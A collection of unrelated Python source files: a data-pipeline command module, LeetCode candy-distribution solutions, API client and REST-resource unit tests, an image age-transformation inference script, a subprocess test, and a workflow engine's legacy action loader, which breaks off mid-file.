mara_pipelines/commands/python.py | timgates42/mara-pipelines | 1,398 | 12663817 | """Commands for running python functions and scripts"""
import inspect
import shlex
import sys
import json
from html import escape
from typing import Union, Callable, List
from ..incremental_processing import file_dependencies
from ..logging import logger
from mara_page import html, _
from .. import pipelines
class RunFunction(pipelines.Command):
def __init__(self, function: Callable = None, args: [str] = None, file_dependencies: [str] = None) -> None:
"""
Runs an arbitrary python function
Args:
function: The parameterless function to run
args: A list of arguments to be passed to the script
file_dependencies: Run triggered based on whether a list of files changed since the last pipeline run
Note:
if you want to pass arguments, then use a lambda function
"""
self.function = function
self.args = args or []
self.file_dependencies = file_dependencies or []
def run(self) -> bool:
dependency_type = 'RunFunction ' + self.function.__name__
if self.file_dependencies:
assert (self.parent)
pipeline_base_path = self.parent.parent.base_path()
if not file_dependencies.is_modified(self.node_path(), dependency_type,
pipeline_base_path,
self.file_dependencies):
logger.log('no changes')
return True
if not self.function(*self.args):
return False
if self.file_dependencies:
file_dependencies.update(self.node_path(), dependency_type, pipeline_base_path, self.file_dependencies)
return True
def html_doc_items(self) -> [(str, str)]:
return [('function', _.pre[escape(str(self.function))]),
('args', _.tt[repr(self.args)]),
(_.i['implementation'], html.highlight_syntax(inspect.getsource(self.function), 'python')),
('file dependencies', [_.i[dependency, _.br] for dependency in self.file_dependencies])]
class ExecutePython(pipelines.Command):
def __init__(self, file_name: Union[Callable, str],
args: Union[Callable, List[str]] = None, file_dependencies: [str] = None) -> None:
"""
Runs a python script in a separate interpreter process
Args:
file_name: the path of the file to run, relative to the pipeline directory
args: A list of arguments to be passed to the script
file_dependencies: Run triggered based on whether a list of files changed since the last pipeline run
"""
self._file_name = file_name
self._args = args or []
self.file_dependencies = file_dependencies or []
@property
def file_name(self):
return self._file_name() if callable(self._file_name) else self._file_name
@property
def args(self):
return self._args() if callable(self._args) else self._args
def run(self) -> bool:
dependency_type = 'ExecutePython ' + self.file_name
if self.file_dependencies:
assert (self.parent)
pipeline_base_path = self.parent.parent.base_path()
if not file_dependencies.is_modified(self.node_path(), dependency_type,
pipeline_base_path,
self.file_dependencies):
logger.log('no changes')
return True
if not super().run():
return False
if self.file_dependencies:
file_dependencies.update(self.node_path(), dependency_type, pipeline_base_path, self.file_dependencies)
return True
def shell_command(self):
return f'{shlex.quote(sys.executable)} -u "{self.parent.parent.base_path() / self.file_name}" {" ".join(map(str, self.args))}'
def html_doc_items(self):
path = self.parent.parent.base_path() / self.file_name
return [
('file name', _.i[self.file_name]),
('args', _.tt[json.dumps(self.args)]),
(_.i['content'], html.highlight_syntax(path.read_text().strip('\n') if path.exists() else '',
'python')),
(_.i['shell command'], html.highlight_syntax(self.shell_command(), 'bash')),
('file dependencies', [_.i[dependency, _.br] for dependency in self.file_dependencies])
]
|
Algo and DSA/LeetCode-Solutions-master/Python/distribute-candies-to-people.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 12663819 | <reponame>Sourav692/FAANG-Interview-Preparation
# Time: O(n + logc), c is the number of candies
# Space: O(1)
class Solution(object):
def distributeCandies(self, candies, num_people):
"""
:type candies: int
:type num_people: int
:rtype: List[int]
"""
# find max integer p s.t. sum(1 + 2 + ... + p) <= C
# => remaining : 0 <= C-(1+p)*p/2 < p+1
# => -2p-2 < p^2+p-2C <= 0
# => 2C+1/4 < (p+3/2)^2 and (p+1/2)^2 <= 2C+1/4
# => sqrt(2C+1/4)-3/2 < p <= sqrt(2C+1/4)-1/2
# => p = floor(sqrt(2C+1/4)-1/2)
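        # Worked example: candies = 10, num_people = 3 gives p = floor(sqrt(20.25)-0.5) = 4,
        # remaining = 10 - 4*5/2 = 0, rows, cols = divmod(4, 3) = (1, 1), and the result is
        # [5, 2, 3] (person 0 gets 1+4, person 1 gets 2, person 2 gets 3)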
p = int((2*candies + 0.25)**0.5 - 0.5)
remaining = candies - (p+1)*p//2
rows, cols = divmod(p, num_people)
result = [0]*num_people
for i in xrange(num_people):
result[i] = (i+1)*(rows+1) + (rows*(rows+1)//2)*num_people if i < cols else \
(i+1)*rows + ((rows-1)*rows//2)*num_people
result[cols] += remaining
return result
# Time: O(n + logc), c is the number of candies
# Space: O(1)
class Solution2(object):
def distributeCandies(self, candies, num_people):
"""
:type candies: int
:type num_people: int
:rtype: List[int]
"""
# find max integer p s.t. sum(1 + 2 + ... + p) <= C
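        # The loop predicate below, mid <= candies*2 // (mid+1), is equivalent to
        # mid*(mid+1)/2 <= candies, i.e. the first mid gifts still fit in the candy budget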
left, right = 1, candies
while left <= right:
mid = left + (right-left)//2
if not ((mid <= candies*2 // (mid+1))):
right = mid-1
else:
left = mid+1
p = right
remaining = candies - (p+1)*p//2
rows, cols = divmod(p, num_people)
result = [0]*num_people
for i in xrange(num_people):
result[i] = (i+1)*(rows+1) + (rows*(rows+1)//2)*num_people if i < cols else \
(i+1)*rows + ((rows-1)*rows//2)*num_people
result[cols] += remaining
return result
# Time: O(sqrt(c)), c is the number of candies
# Space: O(1)
class Solution3(object):
def distributeCandies(self, candies, num_people):
"""
:type candies: int
:type num_people: int
:rtype: List[int]
"""
result = [0]*num_people
i = 0
while candies != 0:
result[i % num_people] += min(candies, i+1)
candies -= min(candies, i+1)
i += 1
return result
|
cape_webservices/tests/test_api/test_client.py | edwardmjackson/cape-webservices | 164 | 12663828 | <gh_stars>100-1000
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cape.client.exceptions import CapeException
from cape_webservices.tests.test_api.conftest import CapeClient, API_URL
import pytest, time
# pytest automatically imports cape_client fixture in conftest.py
def test_token(cape_client):
token = cape_client.get_user_token()
assert token
def test_admin_token(cape_client):
admin_token = cape_client.get_admin_token()
# Authenticate another client using the admin token
cape_client2 = CapeClient(API_URL, admin_token)
token = cape_client2.get_user_token()
assert token == cape_client.get_user_token()
def test_saved_replies(cape_client):
# Get Saved Replies
saved_replies = cape_client.get_saved_replies()['items']
# Delete all existing saved replies
for saved_reply in saved_replies:
cape_client.delete_saved_reply(saved_reply['id'])
assert cape_client.get_saved_replies()['totalItems'] == 0
# Create saved replies
reply_id = cape_client.create_saved_reply(question='Question', answer='Answer')['replyId']
cape_client.create_saved_reply(question='Another Question', answer='Another Answer')
saved_replies = cape_client.get_saved_replies()['items']
assert len(saved_replies) == 2
# Check number_of_items and offset
saved_replies = cape_client.get_saved_replies(number_of_items=1)['items']
assert len(saved_replies) == 1
saved_replies = cape_client.get_saved_replies(offset=1)['items']
assert len(saved_replies) == 1
# Search
saved_replies = cape_client.get_saved_replies(search_term='another')
assert saved_replies['totalItems'] == 1
# Check searchReplyId
specific_replies = cape_client.get_saved_replies(saved_reply_ids=[saved_replies['items'][0]['id']])
assert specific_replies['items'][0]['id'] == saved_replies['items'][0]['id']
# Add paraphrase questions
paraphrase_id = cape_client.add_paraphrase_question(reply_id, question='Paraphrase Question')
cape_client.add_paraphrase_question(reply_id, question='Another Paraphrase Question')
cape_client.add_paraphrase_question(reply_id, question='Yet Another Paraphrase Question')
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['paraphraseQuestions']) == 3
else:
assert len(saved_reply['paraphraseQuestions']) == 0
# Modify paraphrase question
modified_paraphrase_text = 'Modified Paraphrase Question'
cape_client.edit_paraphrase_question(paraphrase_id, modified_paraphrase_text)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
for paraphrase_question in saved_reply['paraphraseQuestions']:
if paraphrase_question['id'] == paraphrase_id:
assert paraphrase_question['question'] == modified_paraphrase_text
else:
assert paraphrase_question['question'] != modified_paraphrase_text
# Delete paraphrase question
cape_client.delete_paraphrase_question(paraphrase_id)
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['paraphraseQuestions']) == 2
else:
assert len(saved_reply['paraphraseQuestions']) == 0
# Modify the canonical question
modified_canonical_question = 'Modified Canonical Question'
cape_client.edit_canonical_question(reply_id, modified_canonical_question)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
assert saved_reply['canonicalQuestion'] == modified_canonical_question
# Add answers
answer_id = cape_client.add_answer(reply_id, answer='Added Answer')
cape_client.add_answer(reply_id, answer='Another Answer')
cape_client.add_answer(reply_id, answer='Yet Another Answer')
cape_client.add_answer(reply_id, answer='You guessed right, another answer')
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['answers']) == 5
else:
assert len(saved_reply['answers']) == 1
# Modify answer
modified_answer_text = 'Modified Answer Text'
cape_client.edit_answer(answer_id, modified_answer_text)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
for answer in saved_reply['answers']:
if answer['id'] == answer_id:
assert answer['answer'] == modified_answer_text
else:
assert answer['answer'] != modified_answer_text
# Delete answer
cape_client.delete_answer(answer_id)
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['answers']) == 4
else:
assert len(saved_reply['answers']) == 1
# Try to delete an answer from a saved reply with only 1 answer
reply_id = cape_client.create_saved_reply('New Question', 'New Answer')['replyId']
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
answer_id = saved_reply['answers'][0]['id']
with pytest.raises(CapeException):
cape_client.delete_answer(answer_id)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
assert len(saved_reply['answers']) == 1
def test_annotations(cape_client):
cape_client.add_annotation('Where is the cat?', 'On the mat', 'Animals', start_offset=12, end_offset=24)
annotations = cape_client.get_annotations(search_term='cat')
assert annotations['totalItems'] == 1
response = cape_client.add_annotation('Where is the dog?', 'On the log', 'Animals', start_offset=34, end_offset=58)
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['totalItems'] == 1
answers = cape_client.answer('Where is the dog?')
assert answers[0]['answerText'] == 'On the log'
assert answers[0]['sourceType'] == 'annotation'
assert answers[0]['metadata']['startOffset'] == 34
annotations = cape_client.get_annotations(document_ids=['Animals'])
assert annotations['totalItems'] == 2
answer_id = cape_client.add_annotation_answer(response['annotationId'], 'Another answer')
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert len(annotations['items'][0]['answers']) == 2
cape_client.edit_annotation_answer(answer_id, 'Yet another answer')
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['answers'][1]['answer'] == 'Yet another answer'
cape_client.delete_annotation_answer(answer_id)
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert len(annotations['items'][0]['answers']) == 1
cape_client.edit_annotation_canonical_question(response['annotationId'], "New question?")
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['canonicalQuestion'] == "New question?"
question_id = cape_client.add_annotation_paraphrase_question(response['annotationId'], "Another question?")
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['paraphraseQuestions'][0]['question'] == "Another question?"
cape_client.edit_annotation_paraphrase_question(question_id, "Yet another question?")
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['paraphraseQuestions'][0]['question'] == "Yet another question?"
cape_client.delete_annotation_paraphrase_question(question_id)
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert len(annotations['items'][0]['paraphraseQuestions']) == 0
cape_client.delete_annotation(response['annotationId'])
annotations = cape_client.get_annotations(document_ids=['Animals'])
assert annotations['totalItems'] == 1
cape_client.add_annotation('Where is the cat?', 'On my hat', 'Strange Animals', start_offset=12, end_offset=24)
answers = cape_client.answer('Where is the cat?', document_ids=['Animals'])
assert answers[0]['answerText'] == 'On the mat'
answers = cape_client.answer('Where is the cat?', document_ids=['Strange Animals'])
assert answers[0]['answerText'] == 'On my hat'
cape_client.add_annotation('Does this have metadata?', 'Yes', 'Custom Stuff', start_offset=0, end_offset=3,
metadata={
'custom_field': 'testing'
})
answers = cape_client.answer('Does this have metadata?', document_ids=['Custom Stuff'])
assert answers[0]['metadata']['custom_field'] == 'testing'
for annotation in cape_client.get_annotations()['items']:
cape_client.delete_annotation(annotation['id'])
with pytest.raises(CapeException):
cape_client.delete_annotation('fakeid')
with pytest.raises(CapeException):
cape_client.add_annotation_answer('fakeid', 'fake answer')
with pytest.raises(CapeException):
cape_client.delete_annotation_answer('fakeid')
with pytest.raises(CapeException):
cape_client.edit_annotation_answer('fakeid', 'fake answer')
with pytest.raises(CapeException):
cape_client.edit_annotation_canonical_question('fakeid', 'fake question')
with pytest.raises(CapeException):
cape_client.add_annotation_paraphrase_question('fakeid', 'fake question')
with pytest.raises(CapeException):
cape_client.edit_annotation_paraphrase_question('fakeid', 'fake question')
with pytest.raises(CapeException):
cape_client.delete_annotation_paraphrase_question('fakeid')
with pytest.raises(CapeException):
cape_client.add_annotation('Do we have both a start and end offset?', 'No', 'Failures', end_offset=43)
with pytest.raises(CapeException):
cape_client.add_annotation('Do we have both a start and end offset?', 'No', 'Failures', start_offset=12)
def test_invalid_delete_reply(cape_client):
with pytest.raises(CapeException):
cape_client.delete_saved_reply('fake')
def test_invalid_edit_canonical_question(cape_client):
with pytest.raises(CapeException):
cape_client.edit_canonical_question('fake', 'Test')
def test_invalid_add_paraphrase_question(cape_client):
with pytest.raises(CapeException):
cape_client.add_paraphrase_question('fake', 'Test')
def test_invalid_edit_paraphrase_question(cape_client):
with pytest.raises(CapeException):
cape_client.edit_paraphrase_question('fake', 'Test')
def test_invalid_delete_paraphrase_question(cape_client):
with pytest.raises(CapeException):
cape_client.delete_paraphrase_question('fake')
def test_invalid_add_answer(cape_client):
with pytest.raises(CapeException):
cape_client.add_answer('fake', 'Test')
def test_invalid_edit_answer(cape_client):
with pytest.raises(CapeException):
cape_client.edit_answer('fake', 'Test')
def test_documents(cape_client):
cape_client.upload_document(title='Test', text='Testing', origin='A test', replace=True)
documents = cape_client.get_documents()['items']
assert len(documents) > 0
for document in documents:
cape_client.delete_document(document['id'])
documents = cape_client.get_documents()['items']
assert len(documents) == 0
def test_answer(cape_client):
documents = cape_client.get_documents()['items']
for document in documents:
cape_client.delete_document(document['id'])
cape_client.upload_document(title='Sky', text='The sky is blue.', origin='sky.txt', replace=True)
answers = cape_client.answer('What colour is the sky?', source_type="document")
assert answers[0]['answerText'] == 'blue'
def test_answer_inline(cape_client):
documents = cape_client.get_documents()['items']
for document in documents:
cape_client.delete_document(document['id'])
answers = cape_client.answer('What colour is the sky?', source_type="document", text="The sky is blue")
assert answers[0]['answerText'] == 'blue'
def test_answer_from_saved_replies(cape_client_answer):
cape_client = cape_client_answer
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a dog?', answer='A dog is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a horse?', answer='A horse is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a cat?', answer='A cat is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a fish?', answer='A fish is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a potato?', answer='A potato is a vegetable')
print(cape_client.get_saved_replies()['totalItems'])
assert cape_client.get_saved_replies()['totalItems'] == 5
# Answer
answers = cape_client.answer('What is a fish?', source_type="saved_reply")
assert answers[0]['answerText'] == 'A fish is a pet'
def test_inbox(cape_client):
events = cape_client.get_inbox()['items']
for event in events:
cape_client.archive_inbox(event['id'])
events = cape_client.get_inbox()['items']
assert len(events) == 0
cape_client.answer('What colour is the sky?')
# HACK: Saving inbox events is sent to a worker and doesn't block, so we can't know for sure when it finishes
time.sleep(1)
events = cape_client.get_inbox()['items']
item = events[0]
assert len(events) == 1
events = cape_client.get_inbox(read=True)['items']
assert len(events) == 0
cape_client.mark_inbox_read(item['id'])
events = cape_client.get_inbox(read=True)['items']
assert len(events) == 1
cape_client.archive_inbox(item['id'])
events = cape_client.get_inbox(read=True)['items']
assert len(events) == 0
def test_default_threshold(cape_client):
cape_client.set_default_threshold('high')
threshold = cape_client.get_default_threshold()
assert threshold == 'high'
cape_client.set_default_threshold('medium')
threshold = cape_client.get_default_threshold()
assert threshold == 'medium'
def test_invalid_threshold(cape_client):
with pytest.raises(CapeException):
cape_client.set_default_threshold('potato')
def test_user_profile(cape_client):
profile = cape_client.get_profile()
assert profile == {'username': 'testuser', 'plan': 'free', 'termsAgreed': False, 'onboardingCompleted': False,
'forwardEmail': None,'forwardEmailVerified':False}
def test_spans(cape_client: CapeClient):
for document in cape_client.get_documents()['items']:
cape_client.delete_document(document['id'])
for saved_reply in cape_client.get_saved_replies()['items']:
cape_client.delete_saved_reply(saved_reply['id'])
texts = {}
texts['Pizza'] = 'I like pizzas.'
texts['Sky'] = "The sky is blue."
texts['Colour'] = "My favorite colour is red"
questions = {"Do you like pizzas ?", "What is red?", "what is sky?"}
for title, text in texts.items():
cape_client.upload_document(title, text, document_id=title)
for question in questions:
answer = cape_client.answer(question)[0]
assert answer['answerText'] in answer['answerContext']
assert answer['answerText'] == texts[answer['sourceId']][
answer['answerTextStartOffset']:answer['answerTextEndOffset']]
assert answer['answerContext'] == texts[answer['sourceId']][
answer['answerContextStartOffset']:answer['answerContextEndOffset']]
for document in cape_client.get_documents()['items']:
cape_client.delete_document(document['id'])
for saved_reply in cape_client.get_saved_replies()['items']:
cape_client.delete_saved_reply(saved_reply['id'])
|
scripts/inference.py | thienquang199x/SAM | 351 | 12663836 | <filename>scripts/inference.py
from argparse import Namespace
import os
import time
from tqdm import tqdm
from PIL import Image
import numpy as np
import torch
from torch.utils.data import DataLoader
import sys
sys.path.append(".")
sys.path.append("..")
from configs import data_configs
from datasets.inference_dataset import InferenceDataset
from datasets.augmentations import AgeTransformer
from utils.common import tensor2im, log_image
from options.test_options import TestOptions
from models.psp import pSp
def run():
test_opts = TestOptions().parse()
out_path_results = os.path.join(test_opts.exp_dir, 'inference_results')
out_path_coupled = os.path.join(test_opts.exp_dir, 'inference_coupled')
os.makedirs(out_path_results, exist_ok=True)
os.makedirs(out_path_coupled, exist_ok=True)
# update test options with options used during training
ckpt = torch.load(test_opts.checkpoint_path, map_location='cpu')
opts = ckpt['opts']
opts.update(vars(test_opts))
opts = Namespace(**opts)
net = pSp(opts)
net.eval()
net.cuda()
age_transformers = [AgeTransformer(target_age=age) for age in opts.target_age.split(',')]
print(f'Loading dataset for {opts.dataset_type}')
dataset_args = data_configs.DATASETS[opts.dataset_type]
transforms_dict = dataset_args['transforms'](opts).get_transforms()
dataset = InferenceDataset(root=opts.data_path,
transform=transforms_dict['transform_inference'],
opts=opts)
dataloader = DataLoader(dataset,
batch_size=opts.test_batch_size,
shuffle=False,
num_workers=int(opts.test_workers),
drop_last=False)
if opts.n_images is None:
opts.n_images = len(dataset)
global_time = []
for age_transformer in age_transformers:
print(f"Running on target age: {age_transformer.target_age}")
global_i = 0
for input_batch in tqdm(dataloader):
if global_i >= opts.n_images:
break
with torch.no_grad():
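                # Apply the target-age conditioning to each image before stacking the batch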
input_age_batch = [age_transformer(img.cpu()).to('cuda') for img in input_batch]
input_age_batch = torch.stack(input_age_batch)
input_cuda = input_age_batch.cuda().float()
tic = time.time()
result_batch = run_on_batch(input_cuda, net, opts)
toc = time.time()
global_time.append(toc - tic)
for i in range(len(input_batch)):
result = tensor2im(result_batch[i])
im_path = dataset.paths[global_i]
                    # Compute the resize target up front so it is defined even when coupled outputs are skipped
                    resize_amount = (256, 256) if opts.resize_outputs else (1024, 1024)
                    if opts.couple_outputs or global_i % 100 == 0:
                        input_im = log_image(input_batch[i], opts)
res = np.concatenate([np.array(input_im.resize(resize_amount)),
np.array(result.resize(resize_amount))], axis=1)
age_out_path_coupled = os.path.join(out_path_coupled, age_transformer.target_age)
os.makedirs(age_out_path_coupled, exist_ok=True)
Image.fromarray(res).save(os.path.join(age_out_path_coupled, os.path.basename(im_path)))
age_out_path_results = os.path.join(out_path_results, age_transformer.target_age)
os.makedirs(age_out_path_results, exist_ok=True)
image_name = os.path.basename(im_path)
im_save_path = os.path.join(age_out_path_results, image_name)
Image.fromarray(np.array(result.resize(resize_amount))).save(im_save_path)
global_i += 1
stats_path = os.path.join(opts.exp_dir, 'stats.txt')
result_str = 'Runtime {:.4f}+-{:.4f}'.format(np.mean(global_time), np.std(global_time))
print(result_str)
with open(stats_path, 'w') as f:
f.write(result_str)
def run_on_batch(inputs, net, opts):
result_batch = net(inputs, randomize_noise=False, resize=opts.resize_outputs)
return result_batch
if __name__ == '__main__':
run()
|
tests/unit/resources/activity/test_alerts.py | doziya/hpeOneView | 107 | 12663877 | <filename>tests/unit/resources/activity/test_alerts.py
# -*- coding: utf-8 -*-
###
# (C) Copyright (2012-2017) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.activity.alerts import Alerts
from hpOneView.resources.resource import ResourceClient
class AlertsTest(TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host)
self._client = Alerts(self.connection)
@mock.patch.object(ResourceClient, 'get_all')
def test_get_all(self, mock_get):
self._client.get_all(filter="name='name'",
sort='name:ascending',
view='day')
mock_get.assert_called_once_with(count=-1,
filter="name='name'",
query='', sort='name:ascending', start=0, view='day')
@mock.patch.object(ResourceClient, 'get')
def test_get_specific(self, mock_get):
self._client.get('35323930-4936-4450-5531-303153474820')
mock_get.assert_called_once_with('35323930-4936-4450-5531-303153474820')
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_called_once(self, mock_get_by):
self._client.get_by('alertState', 'Active')
mock_get_by.assert_called_once_with('alertState', 'Active')
@mock.patch.object(ResourceClient, 'update')
def test_update_should_fail_when_no_uri_is_provided(self, mock_update):
resource = {
'alertState': 'Cleared',
'assignedToUser': 'Paul',
'alertUrgency': 'None',
'notes': 'Problem fixed',
'eTag': '2014-03-28T04:40:06.831Z'
}
self.assertRaises(ValueError, self._client.update, resource)
@mock.patch.object(ResourceClient, 'update')
def test_update_should_use_given_values_by_resource_uri(self, mock_update):
resource = {
'uri': '/rest/alerts/26',
'alertState': 'Cleared',
'assignedToUser': 'Paul',
'alertUrgency': 'None',
'notes': 'Problem fixed',
'eTag': '2014-03-28T04:40:06.831Z'
}
self._client.update(resource.copy(), '/rest/alerts/26')
resource_test = resource.copy()
del resource_test["uri"]
mock_update.assert_called_once_with(resource=resource_test, timeout=-1, uri='/rest/alerts/26')
@mock.patch.object(ResourceClient, 'update')
def test_update_should_use_given_values_by_uri_param(self, mock_update):
resource = {
'alertState': 'Cleared',
'assignedToUser': 'Paul',
'alertUrgency': 'None',
'notes': 'Problem fixed',
'eTag': '2014-03-28T04:40:06.831Z'
}
self._client.update(resource, '/rest/alerts/26')
mock_update.assert_called_once_with(resource=resource.copy(), timeout=-1, uri='/rest/alerts/26')
@mock.patch.object(ResourceClient, 'delete')
def test_delete_called_once(self, mock_delete):
id_alert = '35323930-4936-4450-5531-303153474820'
self._client.delete(id_alert)
mock_delete.assert_called_once_with(id_alert)
@mock.patch.object(ResourceClient, 'delete')
def test_delete_alert_change_log_called_once_by_id(self, mock_delete):
id_alert = '20'
self._client.delete_alert_change_log(id_alert)
mock_delete.assert_called_once_with({'uri': '/rest/alerts/AlertChangeLog/20'})
@mock.patch.object(ResourceClient, 'delete_all')
def test_delete_all_called_once(self, mock_delete):
self._client.delete_all('name="name"')
mock_delete.assert_called_once_with(filter='name="name"', timeout=-1)
@mock.patch.object(ResourceClient, 'delete')
def test_delete_alert_change_log_called_once_by_uri(self, mock_delete):
uri = '/rest/alerts/AlertChangeLog/20'
self._client.delete_alert_change_log(uri)
mock_delete.assert_called_once_with(
{'uri': uri})
|
tests/unit/test_common_subprocess.py | windies21/loopchain | 105 | 12663892 | <reponame>windies21/loopchain
"""Test Common Process"""
import logging
import time
import unittest
from loopchain.baseservice import CommonSubprocess
from loopchain.utils import loggers
loggers.set_preset_type(loggers.PresetType.develop)
loggers.update_preset()
class TestCommonSubprocess(unittest.TestCase):
def test_common_subprocess(self):
# GIVEN
process_args = ['ls']
logging.debug(f"run common subprocess....")
subprocess = CommonSubprocess(process_args)
logging.debug(f"after run common subprocess....")
subprocess.start()
subprocess.start()
subprocess.start()
self.assertTrue(subprocess.is_run())
# WHEN
time.sleep(2)
subprocess.stop()
subprocess.wait()
subprocess.wait()
subprocess.stop()
# THEN
self.assertFalse(subprocess.is_run())
if __name__ == '__main__':
unittest.main()
|
mistral/actions/legacy.py | shubhamdang/mistral | 205 | 12663904 | # Copyright 2020 Nokia Software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from oslo_config import cfg
from oslo_log import log as logging
from stevedore import extension
from mistral_lib import actions as ml_actions
from mistral_lib.utils import inspect_utils as i_utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class GeneratedPythonActionDescriptor(ml_actions.PythonActionDescriptor):
"""Represents a legacy python action generated by a generator.
It's needed temporarily until we fully refactor OpenStack actions in the
'mistral-extra' project. The difference of this descriptor and the standard
PythonActionDescriptor class is how they initialize a spec of parameters
and description.
"""
def __init__(self, name, action_cls, action_cls_attrs=None, namespace='',
project_id=None, scope=None, desc=None, params_spec=None):
super(GeneratedPythonActionDescriptor, self).__init__(
name,
action_cls,
action_cls_attrs,
namespace,
project_id,
scope
)
if desc:
self._desc = desc
if params_spec:
self._params_spec = params_spec
def __repr__(self):
return 'Generated Python action [name=%s, cls=%s, params_spec=%s]' % (
self.name,
self.action_class,
self.params_spec
)
class LegacyActionProvider(ml_actions.ActionProvider):
"""Represents the old way of configuring actions.
There are two sources where this action provider loads actions
from:
* Action classes configured in the entry point "mistral.actions"
* Action classes generated by generators configured in the
entry point "mistral.generators" as a function returning a
collection of them.
"""
def __init__(self, name='legacy'):
super().__init__(name)
# TODO(rakhmerov): Come up with a convenient structure to keep action
# classes indexed so that we could search and filter easily.
self._action_descs = collections.OrderedDict()
self._load_actions()
def _load_actions(self):
self._load_action_plugins()
self._load_action_generators()
def _load_action_plugins(self):
if not CONF.legacy_action_provider.load_action_plugins:
return
LOG.info(
"Loading actions plugged in with the entry point "
"'mistral.actions'..."
)
ext_mgr = extension.ExtensionManager(
namespace='mistral.actions',
invoke_on_load=False
)
for action_name in ext_mgr.names():
action_cls = ext_mgr[action_name].plugin
if CONF.legacy_action_provider.only_builtin_actions:
if not action_cls.__module__.startswith('mistral.'):
continue
action_desc = ml_actions.PythonActionDescriptor(
action_name,
action_cls,
namespace=''
)
self._action_descs[action_name] = action_desc
LOG.debug('Registered action: %s', action_desc)
def _load_action_generators(self):
if not CONF.legacy_action_provider.load_action_generators:
return
LOG.info(
"Loading actions from the action generators plugged in "
"with the entry point 'mistral.generators'"
)
for gen in self._get_action_generators():
self._register_generator_actions(gen)
@staticmethod
def _get_action_generators():
res = []
ext_mgr = extension.ExtensionManager(
namespace='mistral.generators',
invoke_on_load=True
)
# TODO(rakhmerov): this is all ugly. It turns out that the only
# way to register actions via generators is to register a special
# function in the entry point that returns a list of generators.
# But we can't directly register a generator.
for ext in ext_mgr:
if ext.obj is not None:
for gen in ext.obj:
res.append(gen)
return res
def _register_generator_actions(self, generator):
# TODO(rakhmerov): Here we have an implicit dependency on
# "mistral-extra" because ActionGenerator class is defined
# in "mistral-extra". Of course, it works because of duck
# typing but architecture wise it's just very bad. "mistral"
# must not depend on "mistral-extra" because the latter is
# just a project with mistral extensions. In fact, we can't
# even extend ActionGenerator class within "mistral" for
# testing purposes.
# So it's all done this way for compatibility until all
# OpenStack actions are redesigned with action providers.
for action in generator.create_actions():
action_desc = GeneratedPythonActionDescriptor(
action['name'],
generator.base_action_class,
i_utils.get_public_fields(action['class']),
desc=action['description'],
params_spec=action['arg_list']
)
LOG.debug('Registered action: %s', action_desc)
self._action_descs[action['name']] = action_desc
def find(self, action_name, namespace=None):
